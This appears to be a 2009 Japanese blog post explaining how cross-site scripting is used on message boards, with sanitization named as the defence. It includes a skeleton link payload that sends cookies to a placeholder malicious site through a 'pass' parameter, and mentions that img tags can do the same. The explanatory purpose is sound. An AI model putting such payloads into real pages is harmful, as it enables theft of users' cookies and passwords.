IT資産管理ならトランスコスモス

IT 資産管理、ITマネジメント、情報セキュリティ管理。企業が抱える課題をトランスコスモスが解決致します。

コンタクトセンター・カスタマーセンター トランスコスモス

コンタクトセンター・カスタマーセンターの構築・運営ならトランスコスモス。業界最大手ならではの信頼と実績のサービスをご提供いたします。

カラーコンタクトならカラコン 通販 激安MART

カラコンならカラーコンタクト通販激安Mart。イケメグみたいにウルウル目元でデカ目になろう!

  

モンスターカレンダー

? 2009年3月 ?
12345678910111213141516171819202122232425262728293031

XSS(クロスサイトスクリプティング)について2

| コメント(0) | トラックバック(0)

 前回XSS(クロスサイトスクリプティング)についての説明の記事を書いた。今回どのようなケースで悪意のあるスクリプトを書くのか記事を書いてみたいと思う。

 掲示板でHTMLやJavaScriptのタグが使用できるとなると、一体どのよなタグを入れてくるのか?JavaScriptではクッキーが読み出せるので以下のようなタグを入れてくるケースが多い。

<a href='https://悪意のあるサイトURL/?pass=<script>クッキー読み出しのスクリプト</script>'>クリック</a>

 上記の"クリック"を押すと"pass"というパラメータでパスワードなどを保存したクッキーが送信されてしまう。またimgタグを使用すれば画像など読み出しただけで送信されるみたいである。このような事を防ぐ対策として"サニタイジング"というやり方がある。

次回この対策についての記事を書いていきたい。

トラックバック(0)

トラックバックURL: http://honjyo.s362.xrea.com/mt/mt-tb.cgi/15

コメントする